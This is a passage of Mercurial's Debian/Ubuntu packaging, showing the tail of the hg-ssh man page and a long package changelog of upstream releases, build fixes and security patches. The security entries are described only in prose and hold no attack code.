.PP The user with the specified key would then be permitted to push and pull to the repositories using the URLs: .RS .nf ssh://example.com/path/to/repo1 ssh://example.com//path/to/repo2 ssh://example.com/~/repo3 ssh://example.com/~user/repo4 .fi .RE .SH SEE ALSO .BR sshd (8), .BR ssh (1), .BR hg (1). debian/source/0000775000000000000000000000000012261312155010466 5ustar debian/source/include-binaries0000664000000000000000000000004012261310077013621 0ustar debian/upstream-signing-key.pgp debian/source/format0000664000000000000000000000001412201757715011705 0ustar 3.0 (quilt) debian/changelog0000664000000000000000000022576313375564060011072 0ustar mercurial (2.8.2-1ubuntu1.4) trusty-security; urgency=medium * SECURITY UPDATE: Remote attackers can execute arbitrary code via a crafted git ext:: URL when cloning a subrepository. - debian/patches/CVE-2016-3068.patch: set GIT_ALLOW_PROTOCOL to limit git clone protocols. - CVE-2016-3068 * SECURITY UPDATE: Remote attackers can execute arbitrary code via a crafted name when converting a Git repository. - debian/patches/CVE-2016-3069_part1.patch: add new, non-clowny interface for shelling out to git. - debian/patches/CVE-2016-3069_part2.patch: rewrite calls to Git to use the new shelling mechanism. - debian/patches/CVE-2016-3069_part3.patch: dead code removal - old git calling functions - debian/patches/CVE-2016-3069_part4.patch: test for shell injection in git calls - CVE-2016-3069 * SECURITY UPDATE: The convert extension might allow attackers to execute arbitrary code via a crafted git repository name. - debian/patches/CVE-2016-3105.patch: Pass absolute paths to git. - CVE-2016-3105 * SECURITY UPDATE: Remote attackers can execute arbitrary code via a clone, push or pull command because of a list sizing rounding error and short records. - debian/patches/CVE-2016-3630_part1.patch: fix list sizing rounding error. - debian/patches/CVE-2016-3630_part2.patch: detect short records - CVE-2016-3630 * SECURITY UPDATE: hg server --stdio allows remote authenticated users to launch the Python debugger and execute arbitrary code. - debian/patches/CVE-2017-9462.patch: Protect against malicious hg serve --stdio invocations. - CVE-2017-9462 * SECURITY UPDATE: A specially malformed repository can cause GIT subrepositories to run arbitrary code. - debian/patches/CVE-2017-17458_part1.patch: add test-audit-subrepo.t testcase. - debian/patches/CVE-2017-17458_part2.patch: disallow symlink traversal across subrepo mount point. - CVE-2017-17458 * SECURITY UPDATE: Missing symlink check could be abused to write to files outside the repository. - debian/patches/CVE-2017-1000115.patch: Fix symlink traversal. - CVE-2017-1000115 * SECURITY UPDATE: Possible shell-injection attack from not adequately sanitizing hostnames passed to ssh. - debian/patches/CVE-2017-1000116.patch: Sanitize hostnames passed to ssh. - CVE-2017-1000116 * SECURITY UPDATE: Integer underflow and overflow. - debian/patches/CVE-2018-13347.patch: Protect against underflow. - debian/patches/CVE-2018-13347-extras.patch: Protect against overflow. - CVE-2018-13347 * SECURITY UPDATE: Able to start fragment past of the end of original data. - debian/patches/CVE-2018-13346.patch: Ensure fragment start is not past then end of orig. - CVE-2018-13346 * SECURITY UPDATE: Data mishandling in certain situations. - debian/patches/CVE-2018-13348.patch: Be more careful about parsing binary patch data. - CVE-2018-13348 * SECURITY UPDATE: Vulnerability in Protocol server can result in unauthorized data access. - debian/patches/CVE-2018-1000132.patch: Always perform permissions checks on protocol commands. - CVE-2018-1000132 -- Eduardo Barretto Fri, 16 Nov 2018 16:16:59 -0200 mercurial (2.8.2-1ubuntu1.3) trusty-security; urgency=medium [ Jamie Strandboge ] * SECURITY UPDATE: fix for improperly handling case-insensitive paths on Windows and OS X clients - http://selenic.com/repo/hg-stable/rev/885bd7c5c7e3 - http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e - http://selenic.com/repo/hg-stable/rev/6dad422ecc5a - CVE-2014-9390 - LP: #1404035 [ Marc Deslauriers ] * SECURITY UPDATE: arbitrary command exection via crafted repository name in a clone command - d/p/from_upstream__sshpeer_more_thorough_shell_quoting.patch: add more thorough shell quoting to mercurial/sshpeer.py. - CVE-2014-9462 * debian/patches/fix_ftbfs_patchbomb_test.patch: fix patchbomb test. -- Marc Deslauriers Wed, 17 Jun 2015 10:51:42 -0400 mercurial (2.8.2-1ubuntu1) trusty; urgency=medium * debian/tests/control: - Add "allow-stderr" restriction to "testsuite" as it prints out a "Tested with unexpected mercurial lib:" warning. - Disable hgsubversion test as it needs access to anonscm.debian.org which we don't have in Ubuntu CI. -- Martin Pitt Thu, 16 Jan 2014 17:25:51 +0100 mercurial (2.8.2-1) unstable; urgency=medium * New upstream release * Drop for_upstream__fix_i18n.patch as it's now included upstream * Make uscan verify the signature of downloaded tarballs -- Javi Merino Thu, 02 Jan 2014 17:31:05 +0100 mercurial (2.8.1-2) unstable; urgency=low * Pass -f to rm so that repeated builds succeed (Closes: #731623). * Fix installation in the case where there is more than one supported version of Python (Closes: #729153). - Thanks to Faheem Mitha for the patch. * Make test-shelve.t more lenient. This should hopefully fix the semi-intermittent build failures on some architectures with slower buildds. -- Tristan Seligmann Sun, 08 Dec 2013 02:03:54 +0200 mercurial (2.8.1-1) unstable; urgency=low * New upstream release (Closes: #731471) * Add myself to Uploaders. * Add patch to fix test-i18n. * Remove pyflakes test to avoid build failures when pyflakes is installed. -- Tristan Seligmann Fri, 06 Dec 2013 01:14:40 +0200 mercurial (2.8-3) unstable; urgency=low * Fix mercurial-git autopkg test * Add missing deps to run the testsuite with autopkgtest * Increment testsuite timeout to 1440 to prevent timeouts in mips * Move wish to Recommends as it's needed for hg view -- Javi Merino Sun, 17 Nov 2013 10:13:23 +0000 mercurial (2.8-2) unstable; urgency=medium * Increment testsuite timeout to 720 as test-gendoc.t takes a loooong time on armel * Don't run pyflakes on the autopkgtest for the testsuite, it fails to see the pyflakes error it's expecting (but it's not our job to fix python lint issues) -- Javi Merino Fri, 15 Nov 2013 14:10:00 +0000 mercurial (2.8-1) unstable; urgency=low * New upstream release * Fix mercurial-git and hgsubversion autopkgtest by loading the appropriate extension * Bump standards-version to 3.9.5 (no change needed) -- Javi Merino Fri, 01 Nov 2013 23:19:57 +0000 mercurial (2.8~rc1-1) experimental; urgency=low * New upstream release * Fix patches deb_specific__install-help-separately, deb_specific__install-help-separately and deb_specific__install-mo-fhs.patch so that we can run the full testsuite when building * Build-depend on netbase to make test-serve.t work -- Javi Merino Mon, 21 Oct 2013 22:35:36 +0100 mercurial (2.7.2-1) unstable; urgency=low * New upstream release * Revert breaks of mercurial-git back to << 0.4.0-1 (Closes: #725145) * Re-enable the testsuite as the tests that timeout can be blacklisted -- Javi Merino Wed, 02 Oct 2013 23:55:58 +0100 mercurial (2.7.1-3) unstable; urgency=low * Update breaks of mercurial-git to the current version (0.4.0-1) * Add autopkgtest tests -- Javi Merino Tue, 01 Oct 2013 08:48:23 +0100 mercurial (2.7.1-2) unstable; urgency=low * Temporarily don't run the testsuite when building. Since 2.7.1 it timeouts in buildd environments (but works ok if run in the command line). -- Javi Merino Thu, 05 Sep 2013 21:52:14 +0100 mercurial (2.7.1-1) unstable; urgency=low * New upstream release * Enable tests that need networking -- Javi Merino Wed, 04 Sep 2013 23:06:57 +0100 mercurial (2.7-2) unstable; urgency=low * Fix "conffiles not removed" by properly moving them to mercurial-common (Closes: #718621) -- Javi Merino Tue, 13 Aug 2013 23:11:14 +0200 mercurial (2.7-1) unstable; urgency=low * New upstream release * Remove shrink-revlog.py from examples as it is no longer shipped in mercurial -- Javi Merino Sun, 11 Aug 2013 16:09:20 +0200 mercurial (2.6.3-1) unstable; urgency=low * New upstream release * Remove preinst script as it's mostly checks for stuff that was fixed long ago * Remove old checks from postinst * Move config files to mercurial-common * Install bash-completion using debhelper's bash-completion sequencer * Compatible with hgsubversion 1.5 or greater, update breaks to reflect that -- Javi Merino Sun, 21 Jul 2013 23:31:34 +0200 mercurial (2.6.2-1) unstable; urgency=low * New upstream release * Delete patch from_upstream__fix_untranslated_prompts_with_translated_responses.patch which is now included upstream -- Javi Merino Sun, 09 Jun 2013 10:36:59 +0100 mercurial (2.6.1-1) unstable; urgency=low [ Jakub Wilk ] * Use canonical URIs for Vcs-* fields. [ Javi Merino ] * New upstream release (Closes: #709815) * Blacklist test-histedit-arguments.t and test-websub.t * Fix "Translation missing for yes/no question, but requires translated input from user" by adding patch from_upstream__fix_untranslated_prompts_with_translated_responses.patch (Closes: #707703) * Upload to unstable -- Javi Merino Wed, 15 May 2013 22:16:29 +0100 mercurial (2.5.2-1) experimental; urgency=low * New upstream release * Update hgview breaks. hgview works with mercurial 2.5 starting from 1.7.1-1. * test-convert-git.t works again so add it back to the test-suite we run when building the package -- Javi Merino Tue, 19 Mar 2013 22:53:20 +0000 mercurial (2.5.1-1) experimental; urgency=low * New upstream release * Add test-obsolete.t to the blacklisted tests * hgview 1.5.0-4 doesn't work with mercurial 2.5.1 -- Javi Merino Tue, 12 Feb 2013 21:13:06 +0000 mercurial (2.4.2-1) experimental; urgency=low * New upstream release -- Javi Merino Wed, 02 Jan 2013 13:01:27 +0100 mercurial (2.4.1-1) experimental; urgency=low * New upstream release -- Javi Merino Wed, 19 Dec 2012 21:10:25 +0000 mercurial (2.4-1) experimental; urgency=low * New upstream release * mercurial 2.3.1 was not compatible with hgsubversion 1.4 and mercurial-git 0.3.3 * Bump standards-version to 3.9.4 (no change needed) * Add test-commit-amend to the blacklisted tests as it needs styles now -- Javi Merino Tue, 27 Nov 2012 22:35:33 +0000 mercurial (2.3.1-1) experimental; urgency=low * New upstream release * Delete patch for_upstream__hgweb_fix_spelling_error.patch which is now included upstream -- Javi Merino Sun, 16 Sep 2012 16:05:55 +0100 mercurial (2.3-2) experimental; urgency=low * Blacklist test-histedit-revspec as it needs styles -- Javi Merino Sat, 04 Aug 2012 20:56:38 +0200 mercurial (2.3-1) experimental; urgency=low * Don't run the testsuite if nocheck is in DEB_BUILD_OPTIONS * Move to dh v9 to automatically get the Hardening buildflags * Don't Suggest xxdiff, as it's been removed from the archive * New upstream release * Add patch for_upstream__hgweb_fix_spelling_error.patch to fix a spelling error in a manpage -- Javi Merino Fri, 03 Aug 2012 20:53:44 +0200 mercurial (2.2.2-1) unstable; urgency=low * New upstream release -- Javi Merino Sun, 03 Jun 2012 09:17:36 +0100 mercurial (2.2.1-2) unstable; urgency=low * Blacklist test-convert-git.t as it is known to fail with git 1.7.10 and it's making it fail to build in armel. * Build-depend on python-roman (Closes: #671611) -- Javi Merino Sun, 06 May 2012 17:31:51 +0100 mercurial (2.2.1-1) unstable; urgency=low * New upstream release that fixes a memory leak in hgweb * Refresh i18n/{de,da,ja}.po translations in deb_specific__use_sensible-editor.patch -- Javi Merino Fri, 04 May 2012 21:57:42 +0100 mercurial (2.2-2) unstable; urgency=low * Don't patch test-pull-pull-corruption2.t in kfreebsd-i386, armel, sparc or mips, it's now integrated into test-pull-pull-corruption.t -- Javi Merino Wed, 02 May 2012 19:21:40 +0100 mercurial (2.2-1) unstable; urgency=low * New upstream release 2.2 * Delete patches for_upstream__skip_test_gpg_if_not_mercurial_wd.patch and from_upstream__tests_re_silence_test_bad_pull_log_messages.patch which are now included upstream * Refresh patches -- Javi Merino Wed, 02 May 2012 08:08:32 +0100 mercurial (2.1.2-2) unstable; urgency=low * Add sparc to the list of architectures with slow buildds * Import 91eec29dd7de from upstream to fix the test-suite failures in mips and sparc -- Javi Merino Tue, 03 Apr 2012 21:54:05 +0100 mercurial (2.1.2-1) unstable; urgency=low * New upstream release 2.1.2 * Add armel to the list of architectures with slow buildds * Drop patch "deb_specific__no_optim_bdiff_armel.patch" as gcc no longer miscompiles bdiff in armel * Remove confusing entry in Debian.NEWS (Closes: #666549) * Remove patches for_upstream__fix_kfreebsd_test_inherit.patch, from_upstream__dont_translate_the_abort_message_twice.patch and from_upstream__fix_all_remaining_uses_of_inside.patch which are now included upstream * Add patch for_upstream__skip_test_gpg_if_not_mercurial_wd.patch to skip test-gpg when the testsuite is not run in a hg checkout -- Javi Merino Mon, 02 Apr 2012 22:50:29 +0100 mercurial (2.1.1-2) unstable; urgency=low * Add kfreebsd-i386 to the list of slow architectures for the test suite. * Improve the fix for the test-inherit-mode.t patch based on suggestions from upstream * Fix "UnicodeDecodeError when refusing to update" by adding patches from_upstream__dont_translate_the_abort_message_twice.patch and from_upstream__fix_all_remaining_uses_of_inside.patch (Closes: #662207) -- Javi Merino Fri, 09 Mar 2012 00:14:13 +0000 mercurial (2.1.1-1) unstable; urgency=low * New upstream version 2.1.1-1 * Change the group of the test dir in test-inherit-mode.t so that the testsuite doesn't fail in kfreebsd-* * Drop from_upstream__test_check_code_hg_skip_test_if_not_wd.patch which is now included upstream * Upload to unstable -- Javi Merino Sat, 03 Mar 2012 08:03:18 +0000 mercurial (2.1-3) experimental; urgency=low * Remove unused lintian override binary-without-manpage * Bump standards-version to 3.9.3 (no change needed) * Suggest tkcvs instead of tkdiff. tkdiff has been removed from wheezy as tkcvs provides tkdiff (see bug #483362). * Suggest more visual diff commands * Increment test timeout. test-bisect2.t timed out on mips. * Increment the sleeps in the testsuite in mips so that the test produces the same output than in faster architectures * Ignore the output of chmod in a test so that the testsuite doesn't fail in kfreebsd-* * Add patch from_upstream__test_check_code_hg_skip_test_if_not_wd.patch to skip test_check_code_hg instead of having to blacklist it -- Javi Merino Wed, 29 Feb 2012 08:51:26 +0000 mercurial (2.1-2) experimental; urgency=low * Recommend ssh * Bump watch version to 3 since we are using version mangling * Run tests in the buildds * Added my new DD account -- Javi Merino Sat, 25 Feb 2012 18:12:14 +0000 mercurial (2.1-1) unstable; urgency=low * New upstream revision -- Javi Merino Fri, 03 Feb 2012 18:38:19 +0100 mercurial (2.0.2-1) unstable; urgency=low * New upstream revision * Fix "hg-ssh is installed system-wide but uses "/usr/bin/env python" as the python interpreter" with a patch that fixes the interpreter (Closes: #654925) -- Javi Merino Fri, 06 Jan 2012 22:09:32 +0000 mercurial (2.0.1-2) unstable; urgency=low * Team Upload * Update Breaks for hgsubversion (see bug #646946), hg-git (see bug #645037), hgview (see bug #637400), and qct (see bug #637401). -- Jakub Wilk Sun, 11 Dec 2011 23:47:26 +0100 mercurial (2.0.1-1) unstable; urgency=low * New upstream revision (Closes: #650727). * Fix "new -rc release are not properly parsed by watch" with a patch from Pierre-Yves David (Closes: #650728) -- Javi Merino Fri, 02 Dec 2011 21:35:31 +0000 mercurial (2.0-2) unstable; urgency=low * Fix "Cloning fails with: mpatch.mpatchError: patch cannot be decoded" by not compiling bdiff.c with optimizations in armel. This is probably a bug in gcc-4.6 (gcc 4.5 works fine) but while it's solved, at least mercurial works again in armel (Closes: #636396) -- Javi Merino Thu, 03 Nov 2011 23:00:43 +0000 mercurial (2.0-1) unstable; urgency=low * New upstream release 2.0 * Don't include empty directories in the package -- Javi Merino Tue, 01 Nov 2011 22:40:40 +0000 mercurial (1.9.999+2.0rc1-1) experimental; urgency=low * Upstream 2.0 Release Candidate 1 * Cover more uses of "defaults to sensible-editor" in the documentation and support ru and ro translations. -- Javi Merino Sun, 30 Oct 2011 13:20:38 +0000 mercurial (1.9.3-1) unstable; urgency=low * New upstream release 1.9.3. -- Javi Merino Tue, 11 Oct 2011 22:31:33 +0100 mercurial (1.9.2-1) unstable; urgency=low * New upstream release 1.9.2. * Remove old code that removed cruft from site-packages -- Javi Merino Mon, 12 Sep 2011 20:55:12 +0100 mercurial (1.9.1-2) unstable; urgency=low * Update breaks to include all the packages that mercurial-1.9.1-1 broke because of the uncoordinated transition to dh_python2. -- Javi Merino Wed, 10 Aug 2011 21:37:37 +0100 mercurial (1.9.1-1) unstable; urgency=low * Convert to dh_python2 * New upstream release 1.9.1 fixes "cannot import mercurial.httpclient with Python 2.7: 'module' object has no attribute 'PROTOCOL_SSLv2'" (Closes: #635496) -- Javi Merino Wed, 03 Aug 2011 08:00:03 +0100 mercurial (1.9-1) unstable; urgency=low * New upstream release 1.9 (Closes: #632250) * Strip trailing .0 from Debian Policy * Remove template warnings from debian/watch to remove a lintian warning -- Javi Merino Fri, 22 Jul 2011 19:44:26 +0200 mercurial (1.8.3-1) unstable; urgency=low [ Javi Merino ] * New upstream release 1.8.3 * Upgrade Debian Policy to 3.9.2.0 [ Jonathan Nieder ] * Make mercurial-common's Recommends field binNMU-safe (Closes: #626132) -- Javi Merino Tue, 10 May 2011 20:37:27 +0100 mercurial (1.8.1-3) unstable; urgency=low * Team Upload * deb_specific__disable_libdir_replacement.patch: Disable @LIBDIR@ replacement in the hg script, by setup.py (Closes: #620087, LP: #745250) -- Stefano Rivera Thu, 31 Mar 2011 00:06:02 +0200 mercurial (1.8.1-2) unstable; urgency=low [ Vincent Danjean ] * Set /etc/ssl/certs/ca-certificates.crt as default valid root certificates and add a recommends to the ca-certificates package (Closes: #619821) [ Javi Merino ] * Mercurial 1.8 breaks hg-git, add that info to debian/control (Closes: #619930) -- Javi Merino Mon, 28 Mar 2011 21:51:40 +0100 mercurial (1.8.1-1) unstable; urgency=low * New upstream release 1.8.1 backs out a behavior change for so-called 'fast-forward' merges on named branches. -- Javi Merino Sat, 12 Mar 2011 19:01:16 +0000 mercurial (1.8-1) unstable; urgency=low * New upstream release 1.8. Many new features and bugfixes, among them: - hgk: realize it is hgk and not gitk (Closes: #613339) -- Javi Merino Sun, 06 Mar 2011 16:01:58 +0000 mercurial (1.7.5-1) unstable; urgency=low * New upstream release 1.7.5 * Delete patch for_upstream__typo_in_manpage.patch which is now included upstream * Add patch for_upstream__add_backquote_fname.patch , proposed upstream (Closes: #611419) * Add patch from_upstream__fix_611420.patch which will be part of the next mercurial release (Closes: #611420) -- Javi Merino Sat, 05 Feb 2011 21:05:19 +0000 mercurial (1.7.3-1) experimental; urgency=low * New upstream release 1.7.3 * Add patch for_upstream__typo_in_manpage -- Javi Merino Tue, 25 Jan 2011 22:22:56 +0000 mercurial (1.7.2-1) experimental; urgency=low * New upstream release 1.7.2 (Closes: #606678) * Fix typo in NEWS (Closes: #605541) * Delete deb_specific__python-module-not-script.patch and deb_specific__mergetools * Update dh compatibility to 8 -- Javi Merino Mon, 13 Dec 2010 21:34:15 +0000 mercurial (1.6.4-1) unstable; urgency=low * New upstream release 1.6.4 (Closes: #598850) * Verify ssl validity in https connections (Closes: #598841) -- Javi Merino Mon, 04 Oct 2010 07:37:33 -0500 mercurial (1.6.3-1) experimental; urgency=low * New upstream release 1.6.3 * Deleted patch from_upstream__issue2255fix-basicauth.diff which is now included upstream. -- Javi Merino Tue, 31 Aug 2010 10:12:42 +0200 mercurial (1.6.2-2) unstable; urgency=low * The patch that fixed #586907 was not being applied. Now it should work. (Closes: #586907) -- Javi Merino Thu, 26 Aug 2010 16:31:09 +0200 mercurial (1.6.2-1) unstable; urgency=low * New upstream release 1.6.2 * Dropped build-depend on quilt (Closes: #588671) * Added a patch from upstream that works around a bug in python 2.6.5 (Closes: #586907) * Updated Standards-Version to 3.9.1.0 (no change needed) * Deleted patch for_upstream__add_doc_url_in_example_files.patch which is now in upstream. -- Javi Merino Fri, 06 Aug 2010 10:43:06 +0200 mercurial (1.6-2) unstable; urgency=low * Mercurial 1.6 breaks old versions of hg-git (Closes: #588336) -- Javi Merino Wed, 07 Jul 2010 15:48:53 +0200 mercurial (1.6-1) unstable; urgency=low [ Javi Merino ] * New upstream release (1.6). Many bug fixes and improvements. Among them: - push: break infinite http recursion bug with Python 2.6.5 (issue2179 and issue2255) (Closes: #586907) - zeroconf: Don't use string exceptions (Closes: #585250) * Removed patch for_upstream__bashism_in_examples.patch since a fix for #581122 is included upstream. * Updated Standards-Version to 3.9 (no change needed) [ Vincent Danjean ] * debian/control: + Use Breaks instead of Conflicts + Use a fixed version in Replaces I put 1.4 but it has been a long time since nothing has been moved from mercurial to mercurial-common -- Vincent Danjean Sun, 04 Jul 2010 09:55:28 +0200 mercurial (1.5.4-2) unstable; urgency=low * Fix regression in python 2.6.5 (Closes: #586907) -- Javi Merino Thu, 24 Jun 2010 12:46:57 +0200 mercurial (1.5.4-1) unstable; urgency=low * New upstream release (1.5.3). Fixes: * fix Issue2181 (commit generates traceback on Nonetype) * various improvements to SVN conversion support * minor doc improvements * New upstream release (1.5.4) (Closes: #586322). Fixes: * dispatch: include Python version in traceback * push: update help * status: avoid performance regression when no .hgsub is present * clone: fix performance issue with hardlinks and Windows shares * hgweb: fix race in refreshing repo list (issue2188) * hgrc: clarify that hgrc keys can be overridden and sections can be split * eol: new extension for managing file newlines based on a version controlled configuration file * pager: fork and exec pager as parent process with /bin/sh -c * rebase: stress that only local changesets should be rebased * convert/svn: close gettags() log stream (issue2196) * record: check that we are not committing a merge before patch selection -- Javi Merino Wed, 16 Jun 2010 09:51:21 +0200 mercurial (1.5.2-1) unstable; urgency=low * New upstream release. Many minor fixes: + Core * clone: fix URL too long problem with many heads * commands: revised documentation of 'default' and 'default-push' * copies: properly visit file context ancestors on working file contexts * diffstat: use ui.plain() instead of ui.interactive() * dirstate: fix in memory dirstate entries for 1-second race * dispatch: don't mangle ImportError abort messages * filemerge: use working dir parent as ancestor for backward wdir merge * hgrc.5: describe form of config values and mention lists as well * hgweb: fix attribute error in error response (issue2060) * log: document the new xml style * merge: correctly compute the flag for noexec filesystems * patch: don't look for headers in diff lines * push: fix bug in warning message selection * revlog: fix lazyparser.__iter__() to return all revisions (issue2137) * static-http: allow clone -r (issue2164) * subrepo: fix repo root path handling in svn subrepo * subrepo: propagate and catch push failures * templates: document missing template variables * util: fix default termwidth() under Windows * util: use an explicit prefix for checkexec/checklink temporary files + Extensions * convert/cvs: skip bad tags * convert/git: check status when reading output stream * convert/subversion: fix default URL checker prototype * mq: rewrite strip docstrings * mq: use util.unlink instead of os.unlink and os.removedirs * schemes: fix // breakage with Python 2.6.5 (issue2111) * Fix "bashism in /bin/sh hgeditor script" (changing shebang line) (Closes: #581122) -- Vincent Danjean Tue, 11 May 2010 11:01:25 +0200 mercurial (1.5.1-2) unstable; urgency=low * Refresh debian patches * Install localization files in the right place (Closes: #577132) -- Vincent Danjean Sat, 10 Apr 2010 06:58:38 +0200 mercurial (1.5.1-1) unstable; urgency=low * New upstream release -- Vincent Danjean Fri, 02 Apr 2010 10:45:26 +0200 mercurial (1.5-1) unstable; urgency=low * New upstream release + Fix "Reserved revnos aren't." (Closes: #552423) + Fix "Exception in zeroconf shows up in unrelated commands" (Closes: #572963) + Fix "/usr/bin/hg: HG(1) missing --config option syntax" (Closes: #548413) + Fix "A -> B, C -> A rename breaks diff --git" (Closes: #560386) -- Vincent Danjean Fri, 12 Mar 2010 15:10:33 +0100 mercurial (1.4.3-1) unstable; urgency=low * New upstream release. (Closes: #569612) * Updated Standards-Version to 3.8.4 (no change needed) * Remove Gerardo Curiel in the maintainer field as asked by the MIA team (Closes: #553101) * Do not install mercurial.el. It is only useful with emacs21 that will not be in sqeeze. (Closes: #557211) * Add a note in NEWS about the disparition of the alias extension (Closes: #536533) -- Vincent Danjean Mon, 15 Feb 2010 18:08:57 +0100 mercurial (1.4.1-1) unstable; urgency=low * New upstream release -- Vincent Danjean Thu, 03 Dec 2009 22:03:06 +0100 mercurial (1.4-1) unstable; urgency=low [ Vernon Tang ] * New upstream release. - /usr/share/doc/mercurial-common/examples/hg-relink gone (replaced by the relink extension) * Updated Standards-Version to 3.8.3. [ Vincent Danjean ] * adjust quilt dependency so that it works with backports (ie quilt >> 0.46-6 instead of quilt >= 0.46-7) -- Vincent Danjean Thu, 19 Nov 2009 22:02:54 +0100 mercurial (1.3.1-1) unstable; urgency=low * New Upstream Version (mostly bugfixes) -- Vincent Danjean Thu, 23 Jul 2009 22:49:32 +0200 mercurial (1.3-2) unstable; urgency=low * Do not hardcode the python interpreter in the hg script (ie use python and not pythonX.Y...) [thanks Vernon Tang] -- Vincent Danjean Thu, 09 Jul 2009 17:21:25 +0200 mercurial (1.3-1) unstable; urgency=low [ Vincent Danjean ] * [debian/control] add version to the quilt dependency. "dh --with quilt" is only supported since quilt 0.46-7 (thanks Faheem Mitha and Zed Pobre) (Closes: #529700, #534589). [ Luca Falavigna ] * Changes for Python 2.6 transition (Closes: #532190): - Pass --install-layout=deb option to setup.py install call. - Bump python-all-dev dependency to >= 2.5.4-1~. [ Vernon Tang ] * New upstream release. (closes: #536009) - Experimental support for sub-repositories - Fixed support for HTTPS through proxies (closes: #498711) - Experimental share extension - Updated translations and numerous small changes and bug fixes * Updated Standards-Version to 3.8.2. -- Vincent Danjean Wed, 08 Jul 2009 17:03:39 +0200 mercurial (1.2.1-3) unstable; urgency=low * Only install (or remove) files in packages we are building (Closes: #529803) Who knows how dh_install detect if we are building arch-dep and/or arch-indep packages ? -- Vincent Danjean Wed, 27 May 2009 01:46:40 +0200 mercurial (1.2.1-2) unstable; urgency=low * rebuild (forgot to upload arch-all in previous upload) -- Vincent Danjean Tue, 19 May 2009 11:01:15 +0200 mercurial (1.2.1-1) unstable; urgency=low [ Vernon Tang ] * New bugfix upstream release. (Closes: #525403) - fixed version number build from tarball - fix allow_read logic for hgweb - improve handling of damaged revlogs in verify - keep .orig files when resolving - clear resolve state properly when rebasing - improve --command handling with bisect - fix diff against bundles - improve fetch logic for inactive branches - fix diffstat with notify - fix 'synthetic file adds' in CVS conversion [ Vincent Danjean ] * Dump Standards-Version (no change needed) * Switch to dh7 instead of cdbs (last releases of cdbs was breaking the build system) (Closes: #522426, #527504) -- Vincent Danjean Mon, 18 May 2009 19:43:53 +0200 mercurial (1.2-1) unstable; urgency=low * New upstream release. * Fix FTBFS with python-support 0.90 by removing dependence on python-support internals. (closes: #516269) -- Vernon Tang Fri, 06 Mar 2009 17:37:45 +0800 mercurial (1.1.2+hg20090217-7787-b8d750daadde-1) experimental; urgency=low [ Vernon Tang ] * New snapshot for feature freeze before next major release. * debian/patches: - deb_specific__mergetools: remove RCS merge from merge tools - Added: - proposed_upstream__dont-install-i18n - Dropped: - convert-darc-doc.patch: dropping for now to avoid fuzzing translations - backport__zeroconf-doc - Refreshed: - deb_specific__install-templates-separately - deb_specific__mergetools * debian/control: - Add gettext to build dependencies for compiling translations - Remove RCS merge from Recommends - Change merge tool Recommends to Suggests, add xxdiff [ Vincent Danjean ] * swich to debhelper 7. Debhelper 5.0.37.2 is not enought: 6.0.7 at least is required for dh_lintian to be called. * Fix version to hg hash (instead of 'unknown') for this snapshot * Fix upstream version in changelog * Upload to experimental -- Vincent Danjean Wed, 18 Feb 2009 16:24:23 +0100 mercurial (1.1.2-2) unstable; urgency=low * debian/mercurial.postinst: symlink /usr/share/doc/mercurial if dpkg didn't do it when upgrading (closes: #512155) * debian/control: mercurial-common replaces all earlier versions of mercurial -- Vernon Tang Sun, 18 Jan 2009 10:39:58 +0800 mercurial (1.1.2-1) unstable; urgency=low [ Vernon Tang ] * New upstream release (closes: #499846) Also resolves the following Debian bugs: - mq corrupts repository on file rename (closes: #503997) - failing import breaks Python help (closes: #476885) - hg email doesn't use correct encoding (closes: #427854) - error when loading extensions twice (closes: #447088) - static-http does not work with old layout repositories (closes: #494889) - hgwebdir.cgi goes into endless loop when viewing moved files (closes: #506694) * Install hg-ssh (ssh login shell for an hg server) system-wide. * Don't enable extensions by default. (closes: #511872, #503865, #491109) * debian/control: - Moved dependencies to mercurial-common where appropriate - Removed Recommends: python-beaker (not a Mercurial dependency) - Removed 'convert' extension dependencies from Suggests: (convert depends on many of the other SCMs it can convert from) - Added python-openssl to Suggests for "hg serve" HTTPS support. * debian/hgext.rc: updated for 1.1.2. * debian/mercurial*, debian/rules: general cleanup. * debian/README.Debian: updated, proofread, and corrected. * debian/patches: - Added headers. - Added: - deb_specific__install-templates-separately (patch template search path to /usr/share instead of symlinking from the module directory) - backport__zeroconf-doc, proposed_upstream__correct-zeroconf-doc - deb_specific__mergetools - Renamed deb_specific__ElementTree_for_darcs.patch to deb_specific__optional-dependencies and updated to suggest Debian packages for more optional dependencies - Dropped: - proposed_upstream__extension_syntax.patch - deb_specific__FAQ_subst.patch - deb_specific__bash_completion_global_option_already_set.patch - backport__CVE-2008-2942-fix.patch - backport__svn1.5-fix.patch - Refreshed: - deb_specific__use_sensible-editor.patch - deb_specific__hgk.py.patch - convert-darc-doc.patch [ Sandro Tosi ] * debian/control - switch Vcs-Browser field to viewsvn [ Marco Rodrigues ] * debian/control: + Add ${misc:Depends} to Depends to remove lintian warning. [ Vincent Danjean ] * Document the fact that extensions are not enabled by default anymore in the NEWS file * big thanks to Vernon Tang for its work * upload the package -- Vincent Danjean Sat, 17 Jan 2009 17:33:46 +0100 mercurial (1.0.1-5.1) unstable; urgency=high * Non-maintainer upload by the Security Team. * Honor allowpull configuration setting from hgrc on a repository clone to prevent information disclosure (CVE-2008-4297; Closes: #500781). -- Nico Golde Fri, 03 Oct 2008 16:25:13 +0200 mercurial (1.0.1-5) unstable; urgency=low * Fix debian/copyright (GPL-2 only and not GPL-2+) (Closes: #493967) -- Vincent Danjean Tue, 26 Aug 2008 15:28:20 +0200 mercurial (1.0.1-4) unstable; urgency=low * fix subversion 1.5 compatibility (Closes: #492244) using upstream patch * fix bashism in postinst -- Vincent Danjean Thu, 31 Jul 2008 14:27:51 +0200 mercurial (1.0.1-3) unstable; urgency=low * debian/control: + update Standard-Version (no change needed) + add python-beaker as recommends (needed for "hg serve") (Closes: #486299) * fix wrong ucf registration (/etc/hgrc.d/ vs /etc/mercurial/hgrc.d/) (Closes: #487089). Thanks Max Bowsher for noticing. * add a mention to "legacy Darcs 1 format" in convert documentation (Closes: #485887) -- Vincent Danjean Tue, 08 Jul 2008 20:40:05 +0200 mercurial (1.0.1-2) unstable; urgency=high * Backport from upstream: fix CVE-2008-2942 Insufficient input validation (Closes: #488628) -- Vincent Danjean Tue, 01 Jul 2008 18:44:19 +0200 mercurial (1.0.1-1) unstable; urgency=low * New upstream release + Bugfix release * debian/watch: do not call uupdate -- Vincent Danjean Sat, 31 May 2008 19:26:16 +0200 mercurial (1.0-7) unstable; urgency=low * Lowering versioned dependency on ucf. Etch version of ucf is enought. #479485 was using a pre etch version of ucf. -- Vincent Danjean Mon, 26 May 2008 09:25:45 +0200 mercurial (1.0-6) 